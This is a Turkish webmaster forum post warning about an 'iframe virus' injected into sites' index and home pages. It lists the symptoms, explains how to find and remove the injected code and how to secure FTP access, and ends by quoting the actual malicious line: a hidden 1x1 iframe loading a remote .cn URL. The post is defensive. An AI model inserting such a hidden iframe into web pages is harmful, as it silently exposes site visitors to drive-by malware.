TÜM WEBMASTER ARKADAŞLARIMIN DİKKATİNE
Daha önce böyle bir Virüs kodu ile karşılaşmadığım için Forumdaki Webmaster arkadaşlarımı bilgilendirmek istedim.
- Yaklaşık olarak 5 gündür 2k olan sitemin günlük hiti 600-700 tekil hit seviyesine geldi. Buda doğal olarak canımı sıktı.
- Bunun nedeni ne olabilir diye araştırırken daha önce hiç rastlamadığım ve ilk kez gördüğüm bir Virüs kodunun sitemin index`ine girmiş oldugunu farkettim.
- Kodu kaldırdıktan sonra sitemin günlük hitti eski seviyesine tekrar ulaştı.
Gözlemlediğim başka bir zararıda bu 5 gün öncesine kadar belli başlı aramalarada 1. sayfada olan alt sayfalarım nedenini bilmediğim bir şekilde ilgili aramalaradan komple yok olmuşlardı. Kodu kaldırdıktan 2 saat sonra bu sayfalarım tekrar eski yerlerine geldiler.
*** Bu Virüs`ün Zararları ***
- Sitenizi aramalarda geriletebilir.
- Sitenize gelen ziyaretçinin virus programında uyarı çıkartarak ziyaretçiyi siteden uzak tutar.
- Sitenizi “badware” uyarısı alarak hitinizi azaltır.
- Google’ın gözünde Trustrank’ınız düşer.
*** Virüs`ün Etkili Olduğu Alanlar ***
- Virüs ” İndex.htm – İndex.html – İndex.php – home.php – default.php adlı Sayfalara Rahatlıkla Bulaşabiliyor.
*** Virüs Siteme Bulaşmışsa Nasıl Bulabilirim ***
- Virüs Sitenize Bulaşmışsa Yukarıda Belirttiğim Etkili Olduğu Alanlar`daki Sayfaların İçinde ” iframe “ Olarak Aratma Yapınız.
- Bu Aratma Sonuçunda Siteniz İle Alakası Olmayan ” iframe ” Kodu Bulursanız Hemen Siliniz.
*** Virüs`ü Nasıl Temizlerim ***
- Öncelikle Etkili Olduğu Alanlar`daki Sayfalarda Bu Virüs`e Rastlarsanız, Virüs Kodunu Sayfadan Çıkarıp Temiz Dosyalarınızı Ftp`ye Atınız.
- Sonra Ftp Şifrelerinizi Değiştiriniz.
- Bu İşlemleri ” Filezilla – Cute Ftp ” Gibi Ftp Şifrenizi Kayıt Altında Tutan Ftp Programları İle Yapmayınız.
- Ftp`nize Explorer İle Bağlantı Yapınız.
- Explorer İle Bağlantı İçin ( ftp://siteadi@siteadi.com ) Komutunu Kullanın. Karşınıza Panel Çıkacaktır.
- Tüm Bu İşlemlerden Sonra Bilgisayarınıza Virüs Taraması Yaparak Temizleyiniz.
- Bu İşlemlerin Sonunda Virüs Hala Sitenize Geliyorsa, Aynı İşlemleri Baştan Yapın ama Bu Sefer Virüs Taraması Yerine Bilgisayarınıza ” Format ” Atınız.
Bu Konuyu Sadece Bilgilendirme Amaçlı Yazdım. Başınıza Böyle Bir Şey Gelirse Bilginiz Olsun Diye.
Saygılar…
İşte O Kod :
PHP Kodu:
<iframe src="http://perfectnamestore.cn/in.cgi?income7" width=1 height=1 style="visibility: hidden"></iframe>
iframe silme ile ilgili bir script yazmıştım iframe virüsünün ne olduğunu soran arkadaşlar var onlar için bu mesajı yazdım.
r10 da hosyer nickli arkadşaımız yazmıştı oradan ekledim, kendisine teşekkür ederim 